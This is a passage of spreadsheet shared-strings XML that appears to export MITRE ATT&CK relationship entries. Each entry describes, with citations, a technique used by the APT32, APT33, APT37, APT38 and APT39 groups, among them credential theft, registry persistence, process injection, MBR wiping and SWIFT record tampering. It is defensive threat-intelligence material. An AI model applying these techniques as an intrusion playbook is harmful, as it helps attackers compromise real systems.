    <t>[APT32](https://attack.mitre.org/groups/G0050) used WMI to deploy their tools on remote machines and to gather information about the Outlook process.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--18e8e653-d924-4fed-a33f-7893cf8a683b</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</si>
  <si>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</si>
  <si>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relationship--9cacb002-a04a-4779-997e-0cc9efaabda2</t>
  </si>
  <si>
    <t xml:space="preserve">[APT33](https://attack.mitre.org/groups/G0064) has used WinRAR to compress data prior to exfil.(Citation: Symantec Elfin Mar 2019)	
</t>
  </si>
  <si>
    <t>relationship--1f48a517-c041-4845-9aba-2dce4f559b56</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used a variety of publicly available tools like [LaZagne](https://attack.mitre.org/software/S0349) to gather credentials.(Citation: Symantec Elfin Mar 2019)(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>relationship--176244be-553b-48ac-8e38-9b006d6c360e</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used compromised Office 365 accounts in tandem with [Ruler](https://attack.mitre.org/software/S0358) in an attempt to gain control of endpoints.(Citation: Microsoft Holmium June 2020)</t>
  </si>
  <si>
    <t>relationship--e93a3bf7-2ca4-42ed-872a-f9f0f8458936</t>
  </si>
  <si>
    <t>relationship--16952ba0-4fae-450b-990c-2b771efbd60f</t>
  </si>
  <si>
    <t>relationship--9c555aa7-87fa-4c5d-9224-a61cd0d0157f</t>
  </si>
  <si>
    <t>relationship--3baf9dda-1286-4a3b-874b-7a04f0172aae</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used FTP to exfiltrate files (separately from the C2 channel).(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>relationship--a501c3c3-66f7-4128-bf47-b6bf816d5411</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</si>
  <si>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</si>
  <si>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relationship--e948752d-c4a1-4678-97e4-2bd11563115e</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used a publicly available exploit for CVE-2017-0213 to escalate privileges on a local system.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>relationship--f72d9afb-4eb1-4030-9d91-938f80c4bf6e</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used a variety of publicly available tools like Gpppassword to gather credentials.(Citation: Symantec Elfin Mar 2019)(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>relationship--3ca3a169-177b-44aa-b9c1-40e605f8edad</t>
  </si>
  <si>
    <t xml:space="preserve">[APT33](https://attack.mitre.org/groups/G0064) has downloaded additional files and programs from its C2 server.(Citation: Symantec Elfin Mar 2019)(Citation: Microsoft Holmium June 2020)	
</t>
  </si>
  <si>
    <t>relationship--a06ada98-605a-47c5-9362-41e86c2ada6e</t>
  </si>
  <si>
    <t>relationship--990e1dac-f103-47c0-91d8-a5238ffc6b99</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</si>
  <si>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</si>
  <si>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relationship--5fd13ed0-28df-4131-a653-0fa5a760ff95</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used malicious e-mail attachments to lure victims into executing malware.(Citation: Microsoft Holmium June 2020)</t>
  </si>
  <si>
    <t>relationship--ed0428f5-d354-4827-8f9a-95177ce0a1cb</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has lured users to click links to malicious HTML applications delivered via spearphishing emails.(Citation: FireEye APT33 Sept 2017)(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>relationship--f6cd8be3-3145-4088-ae9d-d006be865c01</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used SniffPass to collect credentials by sniffing network traffic.(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>relationship--b1ca60ac-cef2-467e-843c-5732d8885626</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used HTTP over TCP ports 808 and 880 for command and control.(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>relationship--e6b9c4c1-3b84-4957-8533-f96a92dcab2a</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used base64 to encode payloads.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>relationship--3f29b80a-0444-4664-8faa-58a39de9264e</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used password spraying to gain access to target systems.(Citation: FireEye APT33 Guardrail)(Citation: Microsoft Holmium June 2020)</t>
  </si>
  <si>
    <t>relationship--8b5691c7-1815-4d76-a7dd-dfd827043bb9</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has utilized PowerShell to download files from the C2 server and run various scripts. (Citation: Symantec Elfin Mar 2019)(Citation: Microsoft Holmium June 2020)</t>
  </si>
  <si>
    <t>relationship--cd69ba48-b716-4278-b1a0-2efd3bd2d4de</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has deployed a tool known as [DarkComet](https://attack.mitre.org/software/S0334) to the Startup folder of a victim, and used Registry run keys to gain persistence.(Citation: Symantec Elfin Mar 2019)(Citation: Microsoft Holmium June 2020)</t>
  </si>
  <si>
    <t>relationship--d15c3d84-9e21-41ac-9728-f97183b63ec6</t>
  </si>
  <si>
    <t>30 June 2020</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has created a scheduled task to execute a .vbe file multiple times a day.(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>relationship--9a380085-30dd-4a57-bd52-f85acd584e43</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has sent spearphishing e-mails with archive attachments.(Citation: Microsoft Holmium June 2020)</t>
  </si>
  <si>
    <t>relationship--54fd87c2-7d29-422f-bf92-96e7d603563f</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has sent spearphishing emails containing links to .hta files.(Citation: FireEye APT33 Sept 2017)(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>relationship--639e7b8d-57d7-4c1d-8f42-1496606ea666</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used base64 to encode command and control traffic.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>relationship--e1492807-b520-412b-9df7-105aefc29deb</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used AES for encryption of command and control traffic.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>relationship--e053cb07-3e4d-41a1-85a6-38cd2ac0e6ea</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has obtained and leveraged publicly-available tools for early intrusion activities.(Citation: FireEye APT33 Guardrail)(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>relationship--aa82f131-3eeb-4d1a-9f2e-bb2efcc7470b</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used valid accounts for initial access and privilege escalation.(Citation: FireEye APT33 Webinar Sept 2017)(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>relationship--d3d44322-8902-4f56-8625-fb14557c0ca8</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used VBScript to initiate the delivery of payloads.(Citation: Microsoft Holmium June 2020)</t>
  </si>
  <si>
    <t>relationship--e0d647cf-69a0-416f-8db4-cfd72fbd6ad3</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has used HTTP for command and control.(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>relationship--bf7102db-9b22-4534-ac52-83d95152c242</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) has attempted to use WMI event subscriptions to establish persistence on compromised hosts.(Citation: Microsoft Holmium June 2020)</t>
  </si>
  <si>
    <t>relationship--9e1bb696-e1f0-46d3-ab91-79280323d711</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has used an audio capturing utility known as SOUNDWAVE that captures microphone input.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--e66427b2-f353-446a-aedf-decccb926172</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) leverages social networking sites and cloud platforms (AOL, Twitter, Yandex, Mediafire, pCloud, Dropbox, and Box) for C2.(Citation: FireEye APT37 Feb 2018)(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>relationship--32bb5463-c8b5-4ba1-bc13-b242548d5aba</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has a function in the initial dropper to bypass Windows UAC in order to execute the next payload with higher privileges.(Citation: Securelist ScarCruft May 2019)</t>
  </si>
  <si>
    <t>relationship--4a8f7699-3bcd-4586-b029-f43756681805</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has used Ruby scripts to execute payloads.(Citation: Volexity InkySquid RokRAT August 2021)</t>
  </si>
  <si>
    <t>relationship--b906b0a1-12a3-4d6f-82ec-d72a4ef711b4</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has used a credential stealer known as ZUMKONG that can harvest usernames and passwords stored in browsers.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--5e596415-354e-4ccc-bc9d-3deb3fe5de1e</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has collected data from victims' local systems.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--665d8625-e2d1-45d5-b5e3-d9bc0e242e7d</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has access to destructive malware that is capable of overwriting a machine's Master Boot Record (MBR).(Citation: FireEye APT37 Feb 2018)(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>relationship--fcb6fc55-8fa6-4ec7-a5a3-51de7dd90c1d</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</si>
  <si>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</si>
  <si>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relationship--a6d35df2-0711-4b18-b733-6200467056ec</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has used Windows DDE for execution of commands and a malicious VBS.(Citation: Securelist ScarCruft Jun 2016)</t>
  </si>
  <si>
    <t>relationship--7fe2431d-30b9-45ef-8857-ecef17e428a9</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</si>
  <si>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</si>
  <si>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relationship--857b5ce3-0eb0-4dae-a034-42cfa306a447</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has downloaded second stage malware from compromised websites.(Citation: FireEye APT37 Feb 2018)(Citation: Securelist ScarCruft May 2019)(Citation: Volexity InkySquid BLUELIGHT August 2021)(Citation: Volexity InkySquid RokRAT August 2021)</t>
  </si>
  <si>
    <t>relationship--197a0e84-5361-49cc-8e14-24c331665862</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has signed its malware with an invalid digital certificates listed as “Tencent Technology (Shenzhen) Company Limited.”(Citation: Securelist ScarCruft Jun 2016)</t>
  </si>
  <si>
    <t>relationship--490cc52d-1f6d-45d2-aa0e-2221264c0de0</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has sent spearphishing attachments attempting to get a user to open them.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--47415b89-a254-49a8-95c4-7efae85cac2c</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) leverages the Windows API calls: VirtualAlloc(), WriteProcessMemory(), and CreateRemoteThread() for process injection.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>relationship--82c9b9a1-5fbe-49e5-8685-12a03a66ef8d</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) obfuscates strings and payloads.(Citation: Talos Group123)(Citation: Securelist ScarCruft May 2019)(Citation: Volexity InkySquid RokRAT August 2021)</t>
  </si>
  <si>
    <t>relationship--9d88636c-32f1-4ea4-b7d9-948e48055d37</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has a Bluetooth device harvester, which uses Windows Bluetooth APIs to find information on connected Bluetooth devices. (Citation: Securelist ScarCruft May 2019)</t>
  </si>
  <si>
    <t>relationship--09c8ec4f-c76b-4a36-994f-4ed4d87b7ad8</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067)'s Freenki malware lists running processes using the Microsoft Windows API.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>relationship--a9b92f28-c273-48cf-8ee6-dfa6c240cda9</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) injects its malware variant, [ROKRAT](https://attack.mitre.org/software/S0240), into the cmd.exe process.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>relationship--86f8bebc-a5fc-43d7-9af0-0024e07ca8d1</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has used Python scripts to execute payloads.(Citation: Volexity InkySquid RokRAT August 2021)</t>
  </si>
  <si>
    <t>relationship--0d4145da-e755-465f-a6fe-057ce43c627d</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067)'s has added persistence via the Registry key &lt;code&gt;HKCU\Software\Microsoft\CurrentVersion\Run\&lt;/code&gt;.(Citation: FireEye APT37 Feb 2018)(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>relationship--0500bac5-bc50-4529-ae5f-b4e1a85fa7d7</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has created scheduled tasks to run malicious scripts on a compromised host.(Citation: Volexity InkySquid RokRAT August 2021)</t>
  </si>
  <si>
    <t>relationship--f540a7ab-541a-44a5-8b6a-96b42b044d5b</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) delivers malware using spearphishing emails with malicious HWP attachments.(Citation: FireEye APT37 Feb 2018)(Citation: Talos Group123)(Citation: Securelist ScarCruft May 2019)</t>
  </si>
  <si>
    <t>relationship--d0061edc-becf-4ce9-ae91-5e1816d4a894</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) uses steganography to send images to users that are embedded with shellcode.(Citation: Talos Group123)(Citation: Securelist ScarCruft May 2019)</t>
  </si>
  <si>
    <t>relationship--1fedf226-02b4-4634-a7bf-4dac49bd97a3</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) collects the computer name, the BIOS model, and execution path.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>relationship--3ee8862f-2595-462e-8df8-aab639314b65</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) identifies the victim username.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>relationship--4b253464-5a8b-4129-ab1b-ab888314f900</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has used malware that will issue the command &lt;code&gt;shutdown /r /t 1&lt;/code&gt; to reboot a system after wiping its MBR.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>relationship--63759ea4-5bf1-408d-a1cc-e7f52e3aca1b</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) executes shellcode and a VBA script to decode Base64 strings.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>relationship--e7e7718a-b0e1-48cb-a9e8-bcbd0cf25cec</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) uses HTTPS to conceal C2 communications.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>relationship--1e363612-b503-47b2-b697-daf75ef3740a</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) has used the command-line interface.(Citation: FireEye APT37 Feb 2018)(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>relationship--cae6bbd0-d00e-4cc4-872a-d3ac9cc97684</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has collected browser bookmark information to learn more about compromised hosts, obtain personal information about users, and acquire details about internal network resources.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>relationship--658f822e-f11c-4c36-8097-8dd21f45b42e</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used brute force techniques to attempt account access when passwords are unknown or when password hashes are unavailable.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>relationship--7efb7077-5119-4508-b467-f7da76cc6df6</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) clears Window Event logs and Sysmon logs from the system.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>relationship--69b349cf-c086-497b-8339-514d4a448bfe</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) used a Trojan called KEYLIME to collect data from the clipboard.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>relationship--b2a83e1d-f6e8-4cdc-a96e-7bca9a48dfb2</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used CHM files to move concealed payloads.(Citation: Kaspersky Lazarus Under The Hood APR 2017)</t>
  </si>
  <si>
    <t>relationship--cbd7249a-918d-436b-805a-0199eed6567a</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used cron to create pre-scheduled and periodic background jobs on a Linux system.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>relationship--dedf19b5-f91d-4555-93fe-c551f9ca6302</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used a custom secure delete function to make deleted files unrecoverable.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>relationship--77cd972c-459f-4cac-ae21-3cc1a96df09e</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used Hermes ransomware to encrypt files with AES256.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>relationship--02e23a00-846a-4b86-9146-4a7354c23667</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has collected data from a compromised host.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>relationship--d20f3c5a-5987-4223-a97d-64ca0f1231ac</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) have created firewall exemptions on specific ports, including ports 443, 6443, 8443, and 9443.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>relationship--c0a373f1-a0bb-4896-8b9e-ee8d642127a9</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used a custom MBR wiper named BOOTWRECK to render systems inoperable.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>relationship--95f54d2e-cfa0-4afc-a5f4-9da7da55242a</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has conducted watering holes schemes to gain initial access to victims.(Citation: FireEye APT38 Oct 2018)(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>relationship--2d27c0d9-7e8e-4713-b3e1-0d82db27ac9a</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</si>
  <si>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</si>
  <si>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relationship--161225df-de21-4715-b4f3-c324c05ff590</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) have enumerated files and directories, or searched in specific locations within a compromised host.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>relationship--2f19f736-a547-47c3-ae26-40a0d13cdf41</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has prepended a space to all of their terminal commands to operate without leaving traces in the HISTCONTROL environment.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>relationship--5c7716d2-cf4b-43cd-a544-0c94ebf69e23</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) used a backdoor, NESTEGG, that has the capability to download and upload files to and from a victim’s machine.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>relationship--559dfd54-de33-4cfc-aeec-617cd545e870</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) used a Trojan called KEYLIME to capture keystrokes from the victim’s machine.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>relationship--1a49c7e5-32b0-4393-a464-1491b1ebc279</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082)  has attempted to lure victims into enabling malicious macros within email attachments.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>relationship--cd2842e8-13e8-4946-9f16-f0473c6ac205</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) uses a tool called CLEANTOAD that has the capability to modify Registry keys.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>relationship--0ccca05d-955c-40fa-9fd4-c10480abcf3d</t>
  </si>
  <si>
    <t xml:space="preserve">[APT38](https://attack.mitre.org/groups/G0082) has used the Windows API to execute code within a victim's system.(Citation: CISA AA20-239A BeagleBoyz August 2020) </t>
  </si>
  <si>
    <t>relationship--cad2a13a-eb81-4c1c-8d16-beac4bf79625</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has enumerated network shares on a compromised host.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>relationship--82660969-2c24-46a6-a451-1b41240b9ed7</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used PowerShell to execute commands and other operational tasks.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>relationship--d9cd7a48-0728-4e56-9c74-45baf45cf0ff</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) leveraged Sysmon to understand the processes, services in the organization.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>relationship--f4d825cd-08d4-47ad-975c-37b886192e7c</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used rundll32.exe to execute binaries, scripts, and Control Panel Item files and to execute code via proxy to avoid triggering security tools.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>relationship--c27c2970-ae12-46a0-99f8-2aa9137a8de3</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used DYEPACK.FOX to manipulate PDF data as it is accessed to remove traces of fraudulent SWIFT transactions from the data displayed to the end user.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>relationship--c51741a8-7c08-4d6e-9d6a-02da7cc8cc83</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used Task Scheduler to run programs at system startup or on a scheduled basis for persistence.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>relationship--a3157c50-410e-4218-8707-326ab0146c94</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has identified security software, configurations, defensive tools, and sensors installed on a compromised system.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>relationship--1c327eb2-e0af-45c2-a9ea-784252ad34b0</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has created new services or modified existing ones to run executables, commands, or scripts.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>relationship--efaecf33-d565-40fa-baf5-976138f6c883</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium, to pack their implants.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>relationship--61986499-5358-4edc-aab1-6a13ae0f7c06</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has conducted spearphishing campaigns using malicious email attachments.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>relationship--dfb8dd3b-3700-4708-a9ea-ddcc6b750705</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used DYEPACK to create, delete, and alter records in databases used for SWIFT transactions.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>relationship--d032ba7f-4dee-4a98-b400-86e2eb0ee918</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has attempted to get detailed information about a compromised host, including the operating system, version, patches, hotfixes, and service packs.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>relationship--870cebf9-bf09-451c-a894-cad79936bb67</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) installed a port monitoring tool, MAPMAKER, to print the active TCP connections on the local system.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>relationship--11ab80ae-29e7-45a4-8d92-53493e2971c3</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has identified primary users, currently logged in users, sets of users that commonly use a system, or inactive users.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>relationship--064cfeb5-9ddb-4dd2-ada4-cf9e65601dc5</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used a custom MBR wiper named BOOTWRECK, which will initiate a system reboot after wiping the victim's MBR.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>relationship--53c8e757-8043-4d08-8bd6-8d02d2b973cb</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has modified data timestamps to mimic files that are in the same folder on a compromised host.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>relationship--6fa3a8bd-3a66-4f48-9439-97e5ae3dcac9</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has obtained and used open-source tools such as [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: ESET Lazarus KillDisk April 2018)</t>
  </si>
  <si>
    <t>relationship--a7213656-7166-4b88-8d32-f388a2ef1671</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used DYEPACK to manipulate SWIFT messages en route to a printer.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>relationship--8d94276b-c902-4d7c-ae10-d13e127e5149</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used VBScript to execute commands and other operational tasks.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>relationship--457cc54b-4fd9-490f-bb2f-d7d559624388</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>relationship--5577d7ff-58ee-4513-bf01-3be1a60ac2c9</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used web shells for persistence or to ensure redundant access.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>relationship--ae7727c7-6b4a-48fb-8ecb-b07cbe819cad</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has used a command-line tunneler, NACHOCHEESE, to give them shell access to a victim’s machine.(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>relationship--3ab4c52a-aa3d-4c65-bd68-6614a0fb7bfe</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) has installed a new Windows service to establish persistence.(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>relationship--2012985d-6529-4944-a2d2-892d56751b94</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used malware to set &lt;code&gt;LoadAppInit_DLLs&lt;/code&gt; in the Registry key &lt;code&gt;SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; in order to establish persistence.(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>relationship--19785182-3304-4954-9545-30560d159ae2</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used WinRAR and 7-Zip to compress an archive stolen data.(Citation: FireEye APT39 Jan 2019)</t>
  </si>
  <si>
    <t>relationship--5d4ba3fe-d782-47e4-ad82-0b81142a5e1a</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used the BITS protocol to exfiltrate stolen data from a compromised host.(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>relationship--c6b51e0c-d6a8-4815-b1fe-fb065ac0bcaa</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has communicated with C2 through files uploaded to and downloaded from DropBox.(Citation: BitDefender Chafer May 2020)</t>
  </si>
  <si>
    <t>relationship--5b875be8-3849-46e2-80cb-dec502f78f52</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used Ncrack to reveal credentials.(Citation: FireEye APT39 Jan 2019)</t>
  </si>
  <si>
    <t>relationship--c4a566d6-69ce-4284-809d-433663e3e2fa</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used tools capable of stealing contents of the clipboard.(Citation: Symantec Chafer February 2018)</t>
  </si>
  <si>
    <t>relationship--0f81e969-dfc4-4d37-8664-59c31bd7116c</t>
  </si>
  <si>
